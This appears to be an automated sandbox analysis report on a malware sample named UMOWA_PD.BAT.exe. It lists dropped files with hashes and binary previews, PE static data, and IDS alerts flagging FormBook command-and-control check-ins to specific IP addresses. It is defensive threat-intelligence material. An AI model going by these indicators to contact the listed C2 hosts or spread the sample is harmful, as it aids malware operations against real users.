                                                                                  Process:C:\Windows\SysWOW64\ipconfig.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):135168
                                                                                  Entropy (8bit):1.1142956103012707
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                  MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                  SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                  SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                  SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):12288
                                                                                  Entropy (8bit):5.805604762622714
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
                                                                                  MD5:4ADD245D4BA34B04F213409BFE504C07
                                                                                  SHA1:EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
                                                                                  SHA-256:9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
                                                                                  SHA-512:1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: Payment_Advice.1.bat.exe, Detection: malicious, Browse
                                                                                  • Filename: Payment_Advice..exe, Detection: malicious, Browse
                                                                                  • Filename: Payment_Advice..exe, Detection: malicious, Browse
                                                                                  • Filename: Payment_Advice.1.bat.exe, Detection: malicious, Browse
                                                                                  • Filename: Payment_Advice..exe, Detection: malicious, Browse
                                                                                  • Filename: Payment_Advice..exe, Detection: malicious, Browse
                                                                                  • Filename: Overdoers.exe, Detection: malicious, Browse
                                                                                  • Filename: Pedido_52038923_CotizacionS_max2024.bat.exe, Detection: malicious, Browse
                                                                                  • Filename: Overdoers.exe, Detection: malicious, Browse
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\polaritets\Ekspederings.Sup

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):344382
                                                                                  Entropy (8bit):7.669127467049569
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:LjRPmJ8vp6qywQKuKSvsdSSAtqpBztRTTMBKzIu9zTtydYcK/IxWYnzRXiCC2iIp:NYwbuXvxSWqpzOBs99zT4BK/zEzZin/Y
                                                                                  MD5:F07B877AE12AFE19923F01C5B44F678C
                                                                                  SHA1:2303FC8AE533C0408181FACBB76F28D8B01C4527
                                                                                  SHA-256:4D00FF4C230B12DA24BEC1D43EAB04CA5EE5E98C2AE8E965430800FB265094D6
                                                                                  SHA-512:E0451CC014AEB2A42220FB2A186FB6F72D8250055C328C7AB3724D7D647B9BB765C286440611733525129638FD5074DDEEA548FA689D2FA89151C7BC17FC5549
                                                                                  Malicious:false
                                                                                  Preview:..............^^.D...w.....$$$....G................3.<<......aa.....S..........................RRR.........2..................a...o.........+...II........<.y....'.!..................Z.........VV.7.........((.FFFFFF..........SS......SS..hh...A........-...FF.......4,X[Sl..#...DVc:...4@.1H.{&i..m.._.Y.(.)aB.J.j....6...........7..N5..o....}eh`y/Pt.IE.cpG.Q..M..U..wv78..%...!y.znP................3....+.B. ..>f2....].......o.......R......:........E.9v.b.r.f!.f.v.f.v.......\.A^K...FM|..$q.0.s?.....s...........g......d..<..T..;n....4'.f......A.........W...L=...kX....Z...u~....,X[Sl..#...DVc:...4@.1H.{&i.....c.f....-.._.Y.(.)aB.J.j....6....N5..o....}eh`y/Pt.IE......q.D.+pG.Q..M..U..wv78..%...!y.znP.......3....+...3EE.f.t....%. ..>f2....]...R......:........Ef!...f.d..?9v.b.r......\.A^K...FM|..$q.0.s?.......g......d..<..T..;n........f.c..........W...L=...kX....Z...u~....}..4.....6.,X[Sl..#...DVc:...4@.1H.{&i..m.._.Y.(.)aB.J.j....6......f....7..N5..o....}eh`y/Pt.IE.cpG.Q..

                                                                                  C:\Users\user\polaritets\Observationsposters.tor

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):97664
                                                                                  Entropy (8bit):1.2371741628878217
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:XEFQJPKWWG5ARWTJqBshVmdboj6UJY3VBCwYw2ZDRnv+mRQN:XUE/m2O3N
                                                                                  MD5:2B4D5FD79400969869ED030F4803BE99
                                                                                  SHA1:163C23302E2DA2B2265A7CD7ED08BE16A3853DCA
                                                                                  SHA-256:49C47AAA67085C8B38D02DC0F1F792E83FA17D41CE16927888C9085F530E9DB4
                                                                                  SHA-512:7EE103CCCC54B148E7AD62F37FF4ACFC4438436C6F75D15E5248CB19643348C70F2B63062712817002CE4D173E51A7A0C8B3851FCD0FC0D6E1302838909B1C2D
                                                                                  Malicious:false
                                                                                  Preview:...........4................................................K..............................................W.......................................N........................................................@...5..................o............................................)............................................................~....=.................................................................................2................................................5.........................!....................................f.....k....%..................................................................................H...............%.@....................................(...........$.................V..........................................................6..6...........................................................................|....\................................................_........................y...................................................................6..

                                                                                  C:\Users\user\polaritets\Pessoner207.Fra

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):141102
                                                                                  Entropy (8bit):4.617479710733152
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:iVrvbCXCZyD8oXlhfinwSs1OShexKZHGE:iVveeCzfinwSuU0ZmE
                                                                                  MD5:039E70DA01693902106A778C44775442
                                                                                  SHA1:1E1317B39552587567A03AD4D450DBF5B1AEF517
                                                                                  SHA-256:110A6039C806404022CC67992B4732B7916D4D8EFD3AFA16B2A3AF2B60773410
                                                                                  SHA-512:CFB3061902C4CD479364D00029DF8D47BA59EAC27797367E3B606B34DB2552EA465627B9B44D0E95BD4E70B0A2E17F5D728C13EFFA42C2A54F823D9623B5DC91
                                                                                  Malicious:false
                                                                                  Preview:...............H......qqq.................fffff.<...~..............................I................QQQ......''.6.......I...........?...........y..**...............ee.FF...$.........|.QQQ.......g...gg.x...............jj...!.....................**........5.....................................,...MM....../........66..((((....ww..................................w..!!...............................:...._.............yy..................................................MM.>......|||....v......?????.w.........7..Y..".....................z.....H..]..........I....................v..SS..........l...............++.yy.......................ss....*...9.....................`.....gg.......................;;.[................... ....s.J.................O........HHHH.ddddd......O........**.../.--.f....................////..Z................||||..ssss............A.......ww.....................E.........TT...%.==.................GG..HH................?..................gg.Y.I.kkkk..................wwww.

                                                                                  C:\Users\user\polaritets\drupes.ret

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):244138
                                                                                  Entropy (8bit):1.252663089946015
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:cv49C5wBVa5O2Fx8p7KLOTSo3NTuAG15VTvfAX+H7v+uQVsfpqSC26Pn6DD/SNsg:JBQxurv96jREO3X2r
                                                                                  MD5:BBD77A921062C9B6CBF4BEDFF50E1514
                                                                                  SHA1:C25712C5F69E016A364E8898B59E7229E3C5E7A4
                                                                                  SHA-256:E2882B3589FF6D9FA79AC2D88FC8DE8FD94BA046E8B9796203A4916C73731EAD
                                                                                  SHA-512:9BDFC20EFFD587EC19B524E36D392F4863C8242C8D4C8C7F81164A0E0DF84C5BF1633400873D0F68C40079113F9F2568706642334FCFDCCE4C6E0B1D7D5FB660
                                                                                  Malicious:false
                                                                                  Preview:....'........................`............Z......`.................................$..................S........J.........................................................................................................................................................................-........................N....E.......................y.........................................A..........k.............................2...............................%.........................................P.........................................e........................w.....................p.........................o.......................................F........)........................................~................................................................u.....................................................<...............................}.9......................^.................c.................A..............O.........................................................................|.

                                                                                  C:\Users\user\polaritets\quodlibetic.fes

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):438128
                                                                                  Entropy (8bit):1.2562406175237242
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:zN/79C7p5KmH/e6grFLDiN8w27kdDZK5M9aR:hyp5K4e6kFLoMV
                                                                                  MD5:E883CEF7CF2793E15A52C9BAC1CDE472
                                                                                  SHA1:1D4973110569354FA072BA3AFF0BD21EA0DF109A
                                                                                  SHA-256:2FF67336CFEEE418E565B0C79855927FC0CD0B1E9F2F40A59F1CB7EF2328635A
                                                                                  SHA-512:372BE015C3FA19C0EEAA981803900CA088B92188187A69697EEE808068F8033225BFD2927E2DB54EABEECAC05A421DC6CCCABFE19F39788B4F6D4E6F80CE04A5
                                                                                  Malicious:false
                                                                                  Preview:......q......y........................".........................................-....................................................n#............................Jj.........................................................................w.........................$................................................................i.............j.....K...................*.........................................=.........i..........0........~............................[......./.........,........Y.................~..............................................!.......w....................t....................F.......`........................................c.......................j................................................................................................".......................................<..............{..?.J............v........................................................................................................+..................+..................

                                                                                  C:\Users\user\polaritets\roere.hid

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):15722
                                                                                  Entropy (8bit):1.1774803541140593
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:QlmaSsDp47EcNFpMw8GM4Zq+AUUnPMN61WN1:QbSc47/lv8n4Zq+AUQmy4
                                                                                  MD5:A8FD81B22FDC76D0AAE4ABF40CC1E8F4
                                                                                  SHA1:ECA25609E68636E12C3AB63D7E9F1B7717CE450A
                                                                                  SHA-256:13148F74A847C0F474385F1E62C01A5065700A472BF689D7299D3F420A7CC45D
                                                                                  SHA-512:7E0CE6444E0F402278704066AE74F442684B80959CB90CFABA6A3BBCA1EB754EEBCDE11A61FE17D8DE1F708F035BDC2C7825BF9E8F92D761CE0E78BA68544C6B
                                                                                  Malicious:false
                                                                                  Preview:.............L..........................M...................................................................{.........................H.....................................................................................................................................................................................................................................9......8.....'...............}..........................F......................A......aO..........k.....................................................................................P..................................j.......'..:..................................n..............................................~......t.....2...............................................................................{u................................'.................................#.......................................................................t.......j...............r.................................................................

                                                                                  C:\Users\user\polaritets\socialmedicin.sej

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):38361
                                                                                  Entropy (8bit):1.2166387306020765
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:X+F+sq/qAweG+1AI4KbEElQxRqKJOPOXALDW3uYBspm5NfXDZ9:X6M/l17oEnYjP
                                                                                  MD5:2BF0CAC964058C5B0D73930FC7412775
                                                                                  SHA1:003BEC59CB10BDD8B5B760C14DB899637E85AFBE
                                                                                  SHA-256:5A823D12E477927D5133F5B4DE1A5BCB0973FDBBDC4C966C821928CB439FC97A
                                                                                  SHA-512:303CF2DE6CFC652A10E543E0F6484097042234C786624F1B67668CA254B03DE2CCF4D7EB0FB6E13172F605B1B4B742D8694CF3549952523753C5DDE741975564
                                                                                  Malicious:false
                                                                                  Preview:......4......;................g....................................V..................s................................................t........................]...L.........................j...........`.....L..................?........o.............................Oq........................................................................F..............................................................V..................................................C.........../.......{................................................................?...............g.............R....4................................w(........................................c..p.................a....................mt...&..............................X........................Z.......................D.................<.......................h..........b..........X........................................................................m...................0...............F............................w.............r.......

                                                                                  C:\Users\user\polaritets\toader.txt

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):434
                                                                                  Entropy (8bit):4.305884836882498
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:mBX7vwwJDXCuNQLIU/0vkxuYAz8/p7QTrYSCmDEIHlwq+:mBXUWEzR7ylCeEUw
                                                                                  MD5:3F6632F26EBA2C111F54C97312D4C4EA
                                                                                  SHA1:8D3FB7505058C8C5CB22133C77213D6B37CDD5F9
                                                                                  SHA-256:CE8824C6205F36A17C4476BF02839F065009CD15E88970E653CE5F6A89BD9954
                                                                                  SHA-512:EED0879B222E9F074C109B2FA8548F441AD1A4C1CEF8EDB3BAE6D05308E2916061F2A2835E9252A2EDE27608435E40E8C52849B9DD8D38A5FBBEC995628D28E7
                                                                                  Malicious:false
                                                                                  Preview:kumquat equilibrious invector occludes vesteuroperen knippelfines,laparosplenotomy subagents skatkisternes sovehjertet angiospermous abastard caprate efterbyrdens exercised organisationsliniens puberties..ansvarhavendes unhumidified fordjelsesproces forureningsomraades,nondivisive famle illicitly lithophone lattins cubit rougens svmmebrillerne..untestamental transect subfestively subserviently hyldevarer.maaske pastoral overlooks,

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                  Entropy (8bit):7.957826727244492
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:UMOWA_PD.BAT.exe
                                                                                  File size:566'445 bytes
                                                                                  MD5:d1f841d041c915f803dbe6c15b19c510
                                                                                  SHA1:85190628be4d7ed332737df38a580455e29155e1
                                                                                  SHA256:5af56bd9193c8379584ced6a37121e011007666ef1d77518e3e5ea52ec2ca7c5
                                                                                  SHA512:d8a06b312a5f5f6f37e46bee7c360eb32397be08af636699ba5babca7ff61c651fa950093a410eab21ad854012ad765a803735a5c39c1dab39a4aecf6ae107ac
                                                                                  SSDEEP:12288:qX6pZB10nk2cxhmCVvEIM/XHgeewr+Nc20PJbbiEUW34/:qX6pZ+jMh3EIM/LPBqEUW
                                                                                  TLSH:02C4230A79D4C5E7D86A16346FBEF6609BFE7E9005D0939F3F24BE2E3821344590E249
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...c..d.................f...".....

                                                                                  File Icon

                                                                                  Icon Hash:9193c9a1858b8db5

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x4034fc
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x64A0DC63 [Sun Jul 2 02:09:39 2023 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  sub esp, 000003F8h
                                                                                  push ebp
                                                                                  push esi
                                                                                  push edi
                                                                                  push 00000020h
                                                                                  pop edi
                                                                                  xor ebp, ebp
                                                                                  push 00008001h
                                                                                  mov dword ptr [esp+20h], ebp
                                                                                  mov dword ptr [esp+18h], 0040A2D8h
                                                                                  mov dword ptr [esp+14h], ebp
                                                                                  call dword ptr [004080A4h]
                                                                                  mov esi, dword ptr [004080A8h]
                                                                                  lea eax, dword ptr [esp+34h]
                                                                                  push eax
                                                                                  mov dword ptr [esp+4Ch], ebp
                                                                                  mov dword ptr [esp+0000014Ch], ebp
                                                                                  mov dword ptr [esp+00000150h], ebp
                                                                                  mov dword ptr [esp+38h], 0000011Ch
                                                                                  call esi
                                                                                  test eax, eax
                                                                                  jne 00007FE9FCB10CCAh
                                                                                  lea eax, dword ptr [esp+34h]
                                                                                  mov dword ptr [esp+34h], 00000114h
                                                                                  push eax
                                                                                  call esi
                                                                                  mov ax, word ptr [esp+48h]
                                                                                  mov ecx, dword ptr [esp+62h]
                                                                                  sub ax, 00000053h
                                                                                  add ecx, FFFFFFD0h
                                                                                  neg ax
                                                                                  sbb eax, eax
                                                                                  mov byte ptr [esp+0000014Eh], 00000004h
                                                                                  not eax
                                                                                  and eax, ecx
                                                                                  mov word ptr [esp+00000148h], ax
                                                                                  cmp dword ptr [esp+38h], 0Ah
                                                                                  jnc 00007FE9FCB10C98h
                                                                                  and word ptr [esp+42h], 0000h
                                                                                  mov eax, dword ptr [esp+40h]
                                                                                  movzx ecx, byte ptr [esp+3Ch]
                                                                                  mov dword ptr [00429AD8h], eax
                                                                                  xor eax, eax
                                                                                  mov ah, byte ptr [esp+38h]
                                                                                  movzx eax, ax
                                                                                  or eax, ecx
                                                                                  xor ecx, ecx
                                                                                  mov ch, byte ptr [esp+00000148h]
                                                                                  movzx ecx, cx
                                                                                  shl eax, 10h
                                                                                  or eax, ecx
                                                                                  movzx ecx, byte ptr [esp+0000004Eh]

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x4c0000x3440.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x65560x6600dd25e171f2e0fe45f2800cc9e162537dFalse0.6652113970588235data6.456753840355455IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0xa0000x1fb380x6002bc02714ee74ba781d92e94eeaccb080False0.501953125data4.040639308682379IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .ndata0x2a0000x220000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x4c0000x34400x36005950a4e36f0f510396fb34e6e03b573aFalse0.5579427083333334data5.567094918094419IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0x4c2f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States0.7190831556503199
                                                                                  RT_ICON0x4d1a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States0.7035198555956679
                                                                                  RT_ICON0x4da480x668Device independent bitmap graphic, 48 x 96 x 4, image size 1536EnglishUnited States0.33963414634146344
                                                                                  RT_ICON0x4e0b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States0.6423410404624278
                                                                                  RT_ICON0x4e6180x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.39381720430107525
                                                                                  RT_ICON0x4e9000x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.5101351351351351
                                                                                  RT_DIALOG0x4ea280x100dataEnglishUnited States0.5234375
                                                                                  RT_DIALOG0x4eb280x11cdataEnglishUnited States0.6056338028169014
                                                                                  RT_DIALOG0x4ec480xc4dataEnglishUnited States0.5918367346938775
                                                                                  RT_DIALOG0x4ed100x60dataEnglishUnited States0.7291666666666666
                                                                                  RT_GROUP_ICON0x4ed700x5adataEnglishUnited States0.7111111111111111
                                                                                  RT_VERSION0x4edd00x248dataEnglishUnited States0.4811643835616438
                                                                                  RT_MANIFEST0x4f0180x423XML 1.0 document, ASCII text, with very long lines (1059), with no line terminatorsEnglishUnited States0.5127478753541076

                                                                                  Imports

                                                                                  DLLImport
                                                                                  ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                                                  SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                                                  ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                                                  COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                                  USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                                                  GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                                                  KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-09-25T09:53:50.547636+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977184.32.84.3280TCP
                                                                                  2024-09-25T09:53:50.547636+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204982113.248.169.4880TCP
                                                                                  2024-09-25T09:53:50.547636+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977084.32.84.3280TCP
                                                                                  2024-09-25T09:53:50.547636+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983384.32.84.3280TCP
                                                                                  2024-09-25T09:53:50.547636+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983184.32.84.3280TCP
                                                                                  2024-09-25T09:53:50.547636+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204983284.32.84.3280TCP
                                                                                  2024-09-25T09:53:50.547636+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204977284.32.84.3280TCP
                                                                                  2024-09-25T09:53:50.547636+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976013.248.169.4880TCP
                                                                                  2024-09-25T09:54:24.115194+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049755185.86.211.13780TCP
                                                                                  2024-09-25T09:55:03.457929+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.2049757208.91.197.2780TCP
                                                                                  2024-09-25T09:55:03.457929+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049757208.91.197.2780TCP
                                                                                  2024-09-25T09:55:14.453389+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975813.248.169.4880TCP
                                                                                  2024-09-25T09:55:17.089561+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204975913.248.169.4880TCP
                                                                                  2024-09-25T09:55:22.370206+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.204976113.248.169.4880TCP
                                                                                  2024-09-25T09:55:22.370206+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204976113.248.169.4880TCP
                                                                                  2024-09-25T09:55:27.774353+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497623.33.130.19080TCP
                                                                                  2024-09-25T09:55:30.415381+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497633.33.130.19080TCP
                                                                                  2024-09-25T09:55:34.491493+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497643.33.130.19080TCP
                                                                                  2024-09-25T09:55:35.723129+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.11.20497653.33.130.19080TCP
                                                                                  2024-09-25T09:55:35.723129+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497653.33.130.19080TCP
                                                                                  2024-09-25T09:55:41.198251+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497663.33.130.19080TCP
                                                                                  2024-09-25T09:55:43.804631+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497673.33.130.19080TCP
